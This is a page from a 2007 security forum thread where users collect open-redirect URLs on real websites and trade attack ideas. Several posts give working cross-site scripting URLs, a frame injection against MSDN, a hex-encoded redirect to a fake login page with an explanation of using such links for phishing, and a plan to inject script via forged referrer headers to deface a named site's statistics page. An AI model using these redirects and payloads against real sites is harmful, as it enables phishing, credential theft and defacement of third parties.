Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011Next
Current Page: 7 of 11
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: January 17, 2007 06:50PM

http://www2.warnerbros.com/event.ng/Type=click&FlightID=8717&AdID=10507&TargetID=2957&Segments=1,4,5,11,20,21,22,26,27,29,43,45,47,63,80,101,120,123,124,125,126,127,137,141,147,153,154,155,171,174,193,216,220,223,229,230,255,258,261,263,275,279,294,300,302,310,311,339,353,355,358,369,380,381,382,392,421,425,428,478,480,504,511,533,536,552,567,568,569,585,588&Targets=2561,2638,320,2881,2957,135,3073,80,2556,2553,1923,1116,235,550,3043,3048,818&Values=30,46,50,60,72,83,91,100,110,132,205,229,231,474,808,854,924,1640,1702,1844,1862,1873,1877&RawValues=&Redirect=http:%2F%2Fwww.cnn.com/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: January 19, 2007 06:43AM

http://dw.com.com/redir?destUrl=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: January 19, 2007 08:01AM

http://www.yandex.ru/redir?url=http://www.google.com/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 20, 2007 09:11PM

Maddox = | http://maddox.xmission.com/outgoing.cgi?u=http%3A%2F%2Fmaddox%2Exmission%2Enet%2F |

Also, I think that if we work together on this board, and make a link that sends fake referrer headers, we can make an exploit on http://maddox.xmission.com/statistics/statistics.html << this page. We need at least 100 hits on a page that fakes the referrer headers as saying "><script>alert("HEY MADDOX! UPDATE YOU ASSWIPE!");</script> and then throw in an xss defacement page.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 26, 2007 02:39AM

http://www.australia.gov.au/click.php?http://www.rawrcore.net

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: January 26, 2007 02:46PM

http://animaldiversity.ummz.umich.edu/local/redirect.php/http://www.google.com
http://rd.business.com/index.asp?bdcu=http://www.google.com
http://www.ktuh.org/redirect.php?http://www.google.com.
http://www.fasterskier.com/events/results.php?http://www.google.com
http://ozreport.com/redirect.php?Http://www.google.com
http://www.davisstraub.com/OZ/redirect.php?Http://www.google.com
http://www.elib.gov.ph/edatabase/elibgetdb.php/http/www.google.com

Also, anyone have any thoughts on XSSing a redirect, ala http ://www10.dacafe.com/goto.php?'><script>location.replace("http://www.google.com");</script> (sorry the link gets truncated if I paste it directly)

-tx @ lowtech-labs.org



Edited 5 time(s). Last edit at 01/26/2007 05:04PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Tribute
Date: January 28, 2007 05:20PM

http://dect.myspace.com/event.ng/Type=click&Redirect=http://www.google.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 29, 2007 02:58AM

@tx: http://www10.edacafe.com/IP/result_vcx.php?keywords=lol'%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: eyeced
Date: January 29, 2007 09:35AM

http://www.google.co.uk/url?q=http://ebay.co.uk

So i was looking on google, and the redirect was staring at me. Its on the personalise my home page link on google homepage, its alot longer than that link originaly but i started trimming variables from it and it turns out you only need that.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: SW
Date: January 31, 2007 01:12AM

Can someone explain how these are useful? -.-

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: January 31, 2007 02:04PM

http://securebar.secure-tunnel.com/cgi-bin/nph-freebar.cgi/110110A/http/www.google.com

It's actually a proxy, but changing the variable immediately preceding the uri seems to cause it to no longer display their little banner.

http://securebar.secure-tunnel.com/cgi-bin/nph-freebar.cgi/1A/http/www.google.com

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 01/31/2007 02:08PM by tx.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: eyeced
Date: January 31, 2007 04:11PM

SW Wrote:
-------------------------------------------------------
> Can someone explain how these are useful? -.-

For phishing in the middle of the sea...

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: January 31, 2007 08:07PM

@ Previous post:

Basically, they can be used as links that seem legitmate to someone clicking them (encode the URL in hex), and when they click it they are redirected. Because the link they originally clicked looked valid, there's no reason for them to double check, and thus a page that looks like a legitmate login page or something on that site would be seem authentic, but could actually be used to record passwords and whatnot.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: eyeced
Date: February 01, 2007 11:09AM

An example of the google on

http://www.google.co.uk/url?q=http://fakelogin.com

Could be encoded (hex) into

www.google.co.uk/url?q=%0D%0A%68%74%74%70%3A%2F%2F%66%61%6B%65%6C%6F%67%69%6E%2E%63%6F%6D%00

Which looks legitimate enough...

*Just checked and google have patched this now*

-They must actually have some one working for them that reads this forum constantly, as exploits in google are patched very quickly.

*Edit* - they are using timestamps now to make sure that it cannot be permanently used. - thanks trev.



Edited 4 time(s). Last edit at 02/02/2007 11:15AM by eyeced.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: February 01, 2007 01:11PM

eyeced, ust is a Unix timestamp and usg is a checksum of all the parameters. The link you posted is simply only valid a short time, after that you will need to use one with a more current timestamp.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: ascii
Date: February 02, 2007 04:21PM

Grab some funsec:

http://www.ush.it/2007/01/30/bad-url-redirections-aka-many-thanks-to-our-partners/

see you, ascii

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: kirke
Date: February 10, 2007 02:22PM

not sure if already mentioned:
http://msdn.microsoft.com/library/default.asp?url=//ha.ckers.org/images/stallowned.jpg

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: trev
Date: February 11, 2007 08:43PM

Nice frame injection! Always wanted to do this: http://msdn.microsoft.com/library/default.asp?url=//www.msfirefox.com/HAS9DY92828AUS9D29AIS9DI-20I0ASDJA89H2617219I9ASDSADHU28A8HG8DBASY723.html

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 12, 2007 03:25PM

Looks like that msdn redirect is already fixed.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Ghozt
Date: February 13, 2007 01:46AM

tx Wrote:
-------------------------------------------------------
> Looks like that msdn redirect is already fixed.


It only works in Firefox.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 13, 2007 11:05PM

Found one earlier today while my girlfriend was looking at dead kids. They've been Sonny BonOWND.

http://www.mydeathspace.com/go.aspx?back=/App_Errors/404.aspx&go=http://www.awesomeandrew.net/index2.php?content=images/ownd/2


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: tx
Date: February 15, 2007 05:08PM

http://as.cmpnet.com/event.ng/Type=click&Redirect=http://www.google.com

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: February 16, 2007 05:36PM

The MSDN issue is not fixed, but it only works in Firefox if you didn't test in that.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 03:43AM

http://www.regnow.com/softsell/visitor.cgi?action=site&vendor=7998&ref=http://www.awesomeandrew.net

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 03:51AM

http://www.codemasters.com/redirect/redirect.php?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 03:58AM

http://www.northerntelmobility.com/redirect.php?dir=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 04:08AM

www.inow.co.nz/redirect.php?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Date: February 17, 2007 04:17AM

Instant
http://www.jnj.com/leaving.jsp?url=http://www.awesomeandrew.net

Warning
http://www.jnj.com/exit_warning.jsp?url=http://www.awesomeandrew.net


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: alf
Date: February 17, 2007 01:38PM

tx Wrote:
-------------------------------------------------------
> http://animaldiversity.ummz.umich.edu/local/redire
> ct.php/http://www.google.com
> http://rd.business.com/index.asp?bdcu=http://www.g
> oogle.com
> http://www.ktuh.org/redirect.php?http://www.google
> .com.
> http://www.fasterskier.com/events/results.php?http
> ://www.google.com
> http://ozreport.com/redirect.php?Http://www.google
> .com
> http://www.davisstraub.com/OZ/redirect.php?Http://
> www.google.com
> http://www.elib.gov.ph/edatabase/elibgetdb.php/htt
> p/www.google.com
>
> Also, anyone have any thoughts on XSSing a
> redirect, ala http
> ://www10.dacafe.com/goto.php?'>location.replace("h
> ttp://www.google.com"); (sorry the link gets
> truncated if I paste it directly)

example for xss through redirects: http://ozreport.com/redirect.php?data:text/html,<script>alert(1)</script>

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Lockdown
Date: February 17, 2007 09:42PM

This exploit affects the billing systems of countless web hosting companies.

WHMCS (Hosting CMS) Flaw found by Lockdown

http://demo.whmcs.com/dologin.php?goto=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%61%77%72%63%6F%72%65%2E%6E%65%74%2F%69%6E%64%65%78

hai mom

----

-Lockdown-

http://www.rawrcore.net



Edited 1 time(s). Last edit at 02/17/2007 09:43PM by Lockdown.

Options: ReplyQuote
Pages: Previous1234567891011Next
Current Page: 7 of 11


Sorry, only registered users may post in this forum.